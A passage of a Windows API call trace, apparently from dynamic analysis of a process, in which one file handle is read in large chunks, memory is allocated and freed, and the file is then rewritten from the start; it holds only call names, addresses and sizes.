lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.433] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.443] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.445] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.446] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.447] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.448] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.450] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.451] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.453] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.454] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.454] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.543] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.544] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.546] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.546] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.549] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.550] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.555] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0066.555] VirtualQuery (in: lpAddress=0x7eb60000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7eb60000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x370000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.555] VirtualAlloc (lpAddress=0x7eb60000, dwSize=0x200000, flAllocationType=0x2000, flProtect=0x4) returned 0x7eb60000 [0066.557] VirtualAlloc (lpAddress=0x7eb60000, dwSize=0x200000, flAllocationType=0x1000, flProtect=0x4) returned 0x7eb60000 [0066.558] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0066.561] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-16384, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xad7902b [0066.567] VirtualAlloc (lpAddress=0x0, dwSize=0xe0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7edf0000 [0066.588] VirtualQuery (in: lpAddress=0x7eed0000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7eed0000, AllocationBase=0x7eed0000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.588] VirtualAlloc (lpAddress=0x0, dwSize=0x120000, flAllocationType=0x101000, flProtect=0x4) returned 0x7e240000 [0066.698] VirtualQuery (in: lpAddress=0x7e360000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7e360000, AllocationBase=0x7e360000, AllocationProtect=0x4, RegionSize=0x660000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.698] VirtualAlloc (lpAddress=0x0, dwSize=0x170000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ed60000 [0066.716] VirtualQuery (in: lpAddress=0x7eed0000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7eed0000, AllocationBase=0x7eed0000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.716] VirtualAlloc (lpAddress=0x0, dwSize=0x1d0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7e190000 [0066.892] VirtualQuery (in: lpAddress=0x7e360000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7e360000, AllocationBase=0x7e360000, AllocationProtect=0x4, RegionSize=0x660000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.892] VirtualAlloc (lpAddress=0x0, dwSize=0x250000, flAllocationType=0x101000, flProtect=0x4) returned 0x7df40000 [0066.909] VirtualQuery (in: lpAddress=0x7e190000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7e190000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x1d0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.909] VirtualAlloc (lpAddress=0x7e190000, dwSize=0xa0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e190000 [0066.910] VirtualAlloc (lpAddress=0x7e190000, dwSize=0xa0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e190000 [0067.636] VirtualQuery (in: lpAddress=0x7e230000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7e230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.636] VirtualAlloc (lpAddress=0x7e230000, dwSize=0xc0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e230000 [0067.637] VirtualAlloc (lpAddress=0x7e230000, dwSize=0xc0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e230000 [0067.650] VirtualQuery (in: lpAddress=0x7e2f0000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7e2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.651] VirtualAlloc (lpAddress=0x7e2f0000, dwSize=0x70000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e2f0000 [0067.651] VirtualAlloc (lpAddress=0x7e2f0000, dwSize=0x70000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e2f0000 [0067.657] VirtualQuery (in: lpAddress=0x7e360000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7e360000, AllocationBase=0x7e360000, AllocationProtect=0x4, RegionSize=0x660000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.657] VirtualAlloc (lpAddress=0x0, dwSize=0x530000, flAllocationType=0x101000, flProtect=0x4) returned 0x7da10000 [0067.777] VirtualQuery (in: lpAddress=0x7df40000, lpBuffer=0x359f224, dwLength=0x1c | out: lpBuffer=0x359f224*(BaseAddress=0x7df40000, AllocationBase=0x7df40000, AllocationProtect=0x4, RegionSize=0x250000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.777] VirtualFree (lpAddress=0x7df40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.778] VirtualQuery (in: lpAddress=0x7e190000, lpBuffer=0x359f224, dwLength=0x1c | out: lpBuffer=0x359f224*(BaseAddress=0x7e190000, AllocationBase=0x7e190000, AllocationProtect=0x4, RegionSize=0xa0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.778] VirtualFree (lpAddress=0x7e190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.778] VirtualQuery (in: lpAddress=0x7e230000, lpBuffer=0x359f224, dwLength=0x1c | out: lpBuffer=0x359f224*(BaseAddress=0x7e230000, AllocationBase=0x7e230000, AllocationProtect=0x4, RegionSize=0xc0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.778] VirtualFree (lpAddress=0x7e230000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.779] VirtualQuery (in: lpAddress=0x7e2f0000, lpBuffer=0x359f224, dwLength=0x1c | out: lpBuffer=0x359f224*(BaseAddress=0x7e2f0000, AllocationBase=0x7e2f0000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.779] VirtualFree (lpAddress=0x7e2f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.792] VirtualQuery (in: lpAddress=0x7df40000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7df40000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x420000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.792] VirtualAlloc (lpAddress=0x7df40000, dwSize=0x150000, flAllocationType=0x2000, flProtect=0x4) returned 0x7df40000 [0067.793] VirtualAlloc (lpAddress=0x7df40000, dwSize=0x150000, flAllocationType=0x1000, flProtect=0x4) returned 0x7df40000 [0067.808] VirtualQuery (in: lpAddress=0x7e090000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7e090000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x2d0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.808] VirtualAlloc (lpAddress=0x7e090000, dwSize=0x1a0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e090000 [0067.810] VirtualAlloc (lpAddress=0x7e090000, dwSize=0x1a0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e090000 [0067.891] VirtualQuery (in: lpAddress=0x7e360000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7e360000, AllocationBase=0x7e360000, AllocationProtect=0x4, RegionSize=0x660000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.891] VirtualFree (lpAddress=0x7e360000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.892] VirtualQuery (in: lpAddress=0x7e9c0000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7e9c0000, AllocationBase=0x7e9c0000, AllocationProtect=0x4, RegionSize=0x1a0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.892] VirtualFree (lpAddress=0x7e9c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.893] VirtualQuery (in: lpAddress=0x7eb60000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7eb60000, AllocationBase=0x7eb60000, AllocationProtect=0x4, RegionSize=0x200000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.893] VirtualFree (lpAddress=0x7eb60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.893] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4588, lpOverlapped=0x0) returned 1 [0067.893] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0067.893] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.894] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.895] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.895] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.895] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.896] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.897] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.897] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.897] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.898] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.898] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.899] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.899] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.900] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.901] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.901] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.901] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.902] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.913] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.914] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.914] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.915] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.916] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.916] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.917] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.917] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.918] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.918] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.919] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.919] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.920] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.950] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.950] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.951] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.951] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.963] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.963] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.965] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.966] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.967] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.968] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.968] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.969] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.970] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.970] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.971] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.971] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.972] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.973] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, 